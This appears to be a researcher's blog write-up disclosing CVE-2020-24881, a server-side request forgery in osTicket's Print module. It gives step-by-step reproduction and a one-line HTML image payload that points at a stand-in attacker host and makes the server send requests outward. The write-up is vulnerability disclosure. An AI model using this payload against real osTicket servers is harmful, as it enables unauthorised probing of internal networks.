CVE-2020–24881: Server Side Request Forgery in OsTicket

Image for post
Image for post

Server Side Request Forgery in OsTicket

While working on a Penetration Testing Project (let’s say abc company), I came across their support portal. They were using OsTicket 1.12.x. On digging further, I discovered that “Print” module is vulnerable to Server Side Request Forgery (SSRF). I’ll try to keep this writeup as simple as possible.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing

“osTicket is a widely-used open source support ticket system. It seamlessly integrates inquiries created via email, phone and web-based forms into a simple easy-to-use multi-user web interface. Manage, organize and archive all your support requests and responses in one place.”

Exploiting CVE-2020–24881

  1. Click on any ticket [Open or Closed].
  2. In “Post a Reply” section, click on HTML Editor.
  3. I tried different HTML elements like iframe and embed but none of them worked. :( Try using following payload:

<img src=“https://attacker.com”>

5. Post Reply and then click on “Print” button and TA-DAA!

Image for post
Image for post

6. You’ll receive a request from the internal IP of victim machine. I used BurpSuite’s collaborator server and below is the output:

Image for post
Image for post

Impact

Patch

Thanks for reading this write-up!

Linkedin: https://www.linkedin.com/in/talat-mehmood-1a10b2142/

Twitter: https://twitter.com/Blackbatsecuri1

Written by

Ethical Hacker | Bug Bounty Hunter | Freelancer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store